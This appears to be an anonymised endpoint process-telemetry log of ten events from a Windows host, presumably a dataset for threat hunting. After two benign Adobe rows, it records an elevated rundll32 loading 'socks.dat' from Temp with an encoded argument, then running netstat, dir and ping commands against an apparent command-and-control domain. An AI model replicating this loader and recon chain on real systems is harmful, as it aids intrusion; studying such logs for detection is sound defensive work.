+1455,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:57:01.901934800+00:00,12180,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,aba44041ab85b375a2d7a06b3e32bf84,eff994171e80a7d59637b48cf2d338399c468dc245ad8a7cb56d4d15bdc7dc89,791e623973adcbe6888602ae5314180c62f78677,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 01:57:01.882701300+00:00,2932,Adobe Genuine Launcher.exe,"""Adobe Genuine Launcher.exe"" --xmlFilePath=""C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\Documents\AdobeGCData\adobegc_a02968"" --workflowInitiator=SA --xmlFilePath2=""C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\Documents\AdobeGC\adobegc_a02968""",False,2021-06-10 00:46:11.809284200+00:00,4496,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:57:02.059883800+00:00,2021-06-23 01:59:05.206908700+00:00,18a8c33d-b763-4892-bc9a-f08a908de74f,computerpii_0a470890c60768167990033d701e7bd881398861,159477,False,10.7740.19041.1052,False,11540474045172624,,11540474045172626,2021-06-23 01:57:01.882701300+00:00,2932,2021-06-23 01:57:01.882701300+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\Adobe Genuine Launcher.exe,2932,18560,TerminateProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,323272,2021-02-17 03:19:42+00:00,2021-02-16 19:38:26+00:00,2021-06-23 00:53:47.468786+00:00,2020-09-22 19:30:00+00:00,2176,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,0.0,,,,,,,,,Invalid,Unknown,Valid,OsVendor,"Adobe Systems, Incorporated",AdobeGCClient,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,AdobeGCClientLauncher,AdobeGCClientLauncher.exe,Adobe Genuine Launch Utility,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1456,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:57:01.963730500+00:00,18824,AdobeGCClient.exe,"""AdobeGCClient.exe"" --xmlFilePath=""C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\Documents\AdobeGCData\adobegc_a02968"" --workflowInitiator=SA --xmlFilePath2=""C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\Documents\AdobeGC\adobegc_a02968""",PortableExecutable,2020-09-22 19:30:00+00:00,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AdobeGCClient.exe,6743752,99b696fe03a14bd322f39fc35827e487,b57aab0a87e6c85ddf061a0a10bc10b96c61ae827fbb61f514a1df9fffcf263f,43d2475f42eeacb434b632975a33ebc8979a95b3,aba44041ab85b375a2d7a06b3e32bf84,eff994171e80a7d59637b48cf2d338399c468dc245ad8a7cb56d4d15bdc7dc89,791e623973adcbe6888602ae5314180c62f78677,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 01:57:01.882701300+00:00,2932,Adobe Genuine Launcher.exe,"""Adobe Genuine Launcher.exe"" --xmlFilePath=""C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\Documents\AdobeGCData\adobegc_a02968"" --workflowInitiator=SA --xmlFilePath2=""C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\Documents\AdobeGC\adobegc_a02968""",False,2021-06-10 00:46:11.809284200+00:00,4496,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:57:02.066024400+00:00,2021-06-23 01:59:05.206942200+00:00,868ef23d-7b33-4288-9472-e9afc838e8d2,computerpii_0a470890c60768167990033d701e7bd881398861,159478,False,10.7740.19041.1052,False,11540474045172624,,11540474045172627,2021-06-23 01:57:01.882701300+00:00,2932,2021-06-23 01:57:01.882701300+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\Adobe Genuine Launcher.exe,2932,128,TerminateProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,323272,2021-02-17 03:19:42+00:00,2021-02-16 19:38:26+00:00,2021-06-23 00:53:47.468786+00:00,2020-09-22 19:30:00+00:00,2176,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,0.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,"Adobe Systems, Incorporated",AdobeGCClient,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,AdobeGCClientLauncher,AdobeGCClientLauncher.exe,Adobe Genuine Launch Utility,"Adobe Systems, Incorporated",AdobeGCClient,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,AdobeGCClient,AdobeGCClient.exe,Adobe GC Client Application
+1457,True,High,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeFull,NotWeb,2021-06-23 03:22:37.606969800+00:00,9360,cmd.exe,"""cmd.exe"" /c ""netstat -ano | find ""104.238""""",PortableExecutable,2021-02-17 04:34:58.875918800+00:00,C:\Windows\System32\cmd.exe,289792,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,ef3179d498793bf4234f708d3be28633,b53f3c0cd32d7f20849850768da6431e5f876b7bfa61db0aa0700b02873393fa,dd399ae46303343f9f0da189aee11c67bd868222,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 03:16:43.971462700+00:00,16760,rundll32.exe,"""rundll32.exe"" C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\socks.dat,#1 ekaneR12ATiPgB7C3Dr4+At9Lf4ljqq/fA/K4LYq42JQQo2BrDWbpw==",True,2021-06-23 03:16:43.772747700+00:00,6872,\Device\HarddiskVolume3\Windows\System32\dllhost.exe,High,TokenElevationTypeFull,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:22:38.569410+00:00,2021-06-23 03:24:57.733385200+00:00,8e8070a5-7fb5-4a05-8d37-c716ebb8b7fb,computerpii_0a470890c60768167990033d701e7bd881398861,161462,False,10.7740.19041.1052,False,11540474045173046,,11540474045173101,2021-06-23 03:16:43.971462700+00:00,16760,2021-06-23 03:16:43.971462700+00:00,\Device\HarddiskVolume3\Windows\System32\rundll32.exe,16760,18560,ActiveProcessStartkey,C:\Windows\System32,71680,2103-08-07 22:53:31+00:00,2021-02-17 04:35:14.392957300+00:00,2021-06-23 03:14:30.370328400+00:00,2021-02-17 04:35:14.391957+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102296,388102296,False,5.0,1.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,rundll,RUNDLL32.EXE,Windows host process (Rundll32),Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor
+1458,True,High,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeFull,NotWeb,2021-06-23 03:22:37.621191900+00:00,14712,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 03:22:37.606969800+00:00,9360,cmd.exe,"""cmd.exe"" /c ""netstat -ano | find ""104.238""""",True,2021-06-23 03:16:43.971462700+00:00,16760,\Device\HarddiskVolume3\Windows\System32\rundll32.exe,High,TokenElevationTypeFull,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:22:38.570422+00:00,2021-06-23 03:24:57.733419200+00:00,d58fcee0-1b26-4804-b084-47a8b471d92f,computerpii_0a470890c60768167990033d701e7bd881398861,161463,False,10.7740.19041.1052,False,11540474045173101,,11540474045173102,2021-06-23 03:22:37.606969800+00:00,9360,2021-06-23 03:22:37.606969800+00:00,\Device\HarddiskVolume3\Windows\System32\cmd.exe,9360,18560,TerminateProcessStartkey,C:\Windows\System32,289792,2090-01-16 09:26:43+00:00,2021-02-17 04:34:58.881082900+00:00,2021-06-23 03:08:14.153437700+00:00,2021-02-17 04:34:58.875918800+00:00,18560,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102296,388102296,False,,,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1459,True,High,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeFull,NotWeb,2021-06-23 03:22:37.663596100+00:00,1348,NETSTAT.EXE,netstat  -ano ,PortableExecutable,2019-12-07 09:09:34.006180900+00:00,C:\Windows\System32\NETSTAT.EXE,39936,7fddd6681ea81ce26e64452336f479e6,b094e827af70241d71bed9767ec1a254fdc4164a646b2ba4c7105cd783adba0d,c038069021cea437ae40b421929e9d4d1a3440b3,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 03:22:37.606969800+00:00,9360,cmd.exe,"""cmd.exe"" /c ""netstat -ano | find ""104.238""""",True,2021-06-23 03:16:43.971462700+00:00,16760,\Device\HarddiskVolume3\Windows\System32\rundll32.exe,High,TokenElevationTypeFull,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:22:38.574610500+00:00,2021-06-23 03:24:57.733452200+00:00,661c8cb0-edaa-4d33-84ac-ebe08a7b10ef,computerpii_0a470890c60768167990033d701e7bd881398861,161464,False,10.7740.19041.1052,False,11540474045173101,,11540474045173103,2021-06-23 03:22:37.606969800+00:00,9360,2021-06-23 03:22:37.606969800+00:00,\Device\HarddiskVolume3\Windows\System32\cmd.exe,9360,18560,TerminateProcessStartkey,C:\Windows\System32,289792,2090-01-16 09:26:43+00:00,2021-02-17 04:34:58.881082900+00:00,2021-06-23 03:08:14.153437700+00:00,2021-02-17 04:34:58.875918800+00:00,18560,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102296,388102296,False,,,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,netstat.exe,netstat.exe,TCP/IP Netstat Command
+1460,True,High,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeFull,NotWeb,2021-06-23 03:22:37.693973300+00:00,14792,find.exe,"find  ""104.238""",PortableExecutable,2019-12-07 09:09:37.707866+00:00,C:\Windows\System32\find.exe,17920,ae3f3dc3ed900f2a582bad86a764508c,1a1876c5eed2b8cd9e14ebff3f4eeb7e21552a4c6aab4bf392a55f8df3612dab,1e44ee63bdb2cf3a6e48b521844204218a001344,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 03:22:37.606969800+00:00,9360,cmd.exe,"""cmd.exe"" /c ""netstat -ano | find ""104.238""""",True,2021-06-23 03:16:43.971462700+00:00,16760,\Device\HarddiskVolume3\Windows\System32\rundll32.exe,High,TokenElevationTypeFull,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:22:38.577839800+00:00,2021-06-23 03:24:57.733486900+00:00,143c4f07-6581-4453-b580-1f316d7269d8,computerpii_0a470890c60768167990033d701e7bd881398861,161465,False,10.7740.19041.1052,False,11540474045173101,,11540474045173104,2021-06-23 03:22:37.606969800+00:00,9360,2021-06-23 03:22:37.606969800+00:00,\Device\HarddiskVolume3\Windows\System32\cmd.exe,9360,18560,TerminateProcessStartkey,C:\Windows\System32,289792,2090-01-16 09:26:43+00:00,2021-02-17 04:34:58.881082900+00:00,2021-06-23 03:08:14.153437700+00:00,2021-02-17 04:34:58.875918800+00:00,18560,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102296,388102296,False,,,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,find,FIND.EXE,Find String (grep) Utility
+1461,True,High,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeFull,NotWeb,2021-06-23 03:22:54.183235300+00:00,7340,cmd.exe,"""cmd.exe"" /c ""dir c:\windows\system32\wmic.dll""",PortableExecutable,2021-02-17 04:34:58.875918800+00:00,C:\Windows\System32\cmd.exe,289792,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,ef3179d498793bf4234f708d3be28633,b53f3c0cd32d7f20849850768da6431e5f876b7bfa61db0aa0700b02873393fa,dd399ae46303343f9f0da189aee11c67bd868222,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 03:16:43.971462700+00:00,16760,rundll32.exe,"""rundll32.exe"" C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\socks.dat,#1 ekaneR12ATiPgB7C3Dr4+At9Lf4ljqq/fA/K4LYq42JQQo2BrDWbpw==",True,2021-06-23 03:16:43.772747700+00:00,6872,\Device\HarddiskVolume3\Windows\System32\dllhost.exe,High,TokenElevationTypeFull,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:22:54.610851200+00:00,2021-06-23 03:24:57.733646200+00:00,05c0467c-8635-4cf8-a966-f500e500d036,computerpii_0a470890c60768167990033d701e7bd881398861,161470,False,10.7740.19041.1052,False,11540474045173046,,11540474045173105,2021-06-23 03:16:43.971462700+00:00,16760,2021-06-23 03:16:43.971462700+00:00,\Device\HarddiskVolume3\Windows\System32\rundll32.exe,16760,18560,ActiveProcessStartkey,C:\Windows\System32,71680,2103-08-07 22:53:31+00:00,2021-02-17 04:35:14.392957300+00:00,2021-06-23 03:14:30.370328400+00:00,2021-02-17 04:35:14.391957+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102296,388102296,False,5.0,1.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,rundll,RUNDLL32.EXE,Windows host process (Rundll32),Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor
+1462,True,High,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeFull,NotWeb,2021-06-23 03:22:54.196487700+00:00,7844,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 03:22:54.183235300+00:00,7340,cmd.exe,"""cmd.exe"" /c ""dir c:\windows\system32\wmic.dll""",True,2021-06-23 03:16:43.971462700+00:00,16760,\Device\HarddiskVolume3\Windows\System32\rundll32.exe,High,TokenElevationTypeFull,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:22:54.611088+00:00,2021-06-23 03:24:57.733679700+00:00,8b1c8206-8fc5-4f68-9e17-4a5959446f9b,computerpii_0a470890c60768167990033d701e7bd881398861,161471,False,10.7740.19041.1052,False,11540474045173105,,11540474045173106,2021-06-23 03:22:54.183235300+00:00,7340,2021-06-23 03:22:54.183235300+00:00,\Device\HarddiskVolume3\Windows\System32\cmd.exe,7340,18560,TerminateProcessStartkey,C:\Windows\System32,289792,2090-01-16 09:26:43+00:00,2021-02-17 04:34:58.881082900+00:00,2021-06-23 03:08:14.153437700+00:00,2021-02-17 04:34:58.875918800+00:00,18560,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102296,388102296,False,,,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1463,True,High,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeFull,NotWeb,2021-06-23 03:23:14.654837100+00:00,18244,cmd.exe,"""cmd.exe"" /c ""ping -n 1 www.bingnewspaper.com""",PortableExecutable,2021-02-17 04:34:58.875918800+00:00,C:\Windows\System32\cmd.exe,289792,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,ef3179d498793bf4234f708d3be28633,b53f3c0cd32d7f20849850768da6431e5f876b7bfa61db0aa0700b02873393fa,dd399ae46303343f9f0da189aee11c67bd868222,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 03:16:43.971462700+00:00,16760,rundll32.exe,"""rundll32.exe"" C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\socks.dat,#1 ekaneR12ATiPgB7C3Dr4+At9Lf4ljqq/fA/K4LYq42JQQo2BrDWbpw==",True,2021-06-23 03:16:43.772747700+00:00,6872,\Device\HarddiskVolume3\Windows\System32\dllhost.exe,High,TokenElevationTypeFull,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:23:14.958836400+00:00,2021-06-23 03:24:57.734001700+00:00,e3e2d560-751a-4985-9b88-18f021c67fd8,computerpii_0a470890c60768167990033d701e7bd881398861,161480,False,10.7740.19041.1052,False,11540474045173046,,11540474045173110,2021-06-23 03:16:43.971462700+00:00,16760,2021-06-23 03:16:43.971462700+00:00,rundll32.exe,16760,256,ActiveProcessStartkey,C:\Windows\System32,71680,2103-08-07 22:53:31+00:00,2021-02-17 04:35:14.392957300+00:00,2021-06-23 03:14:30.370328400+00:00,2021-02-17 04:35:14.391957+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102296,388102296,False,5.0,1.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,rundll,RUNDLL32.EXE,Windows host process (Rundll32),Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor
+1464,True,High,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeFull,NotWeb,2021-06-23 03:23:14.678506500+00:00,13212,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 03:23:14.654837100+00:00,18244,cmd.exe,"""cmd.exe"" /c ""ping -n 1 www.bingnewspaper.com""",True,2021-06-23 03:16:43.971462700+00:00,16760,rundll32.exe,High,TokenElevationTypeFull,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:23:14.959910900+00:00,2021-06-23 03:24:57.734035200+00:00,deea75ef-3e12-4202-b7fd-a11ee1d2bc7a,computerpii_0a470890c60768167990033d701e7bd881398861,161481,False,10.7740.19041.1052,False,11540474045173110,,11540474045173111,2021-06-23 03:23:14.654837100+00:00,18244,2021-06-23 03:23:14.654837100+00:00,cmd.exe,18244,256,ActiveProcessStartkey,C:\Windows\System32,289792,2090-01-16 09:26:43+00:00,2021-02-17 04:34:58.881082900+00:00,2021-06-23 03:23:14.692310600+00:00,2021-02-17 04:34:58.875918800+00:00,256,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102296,388102296,False,,,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
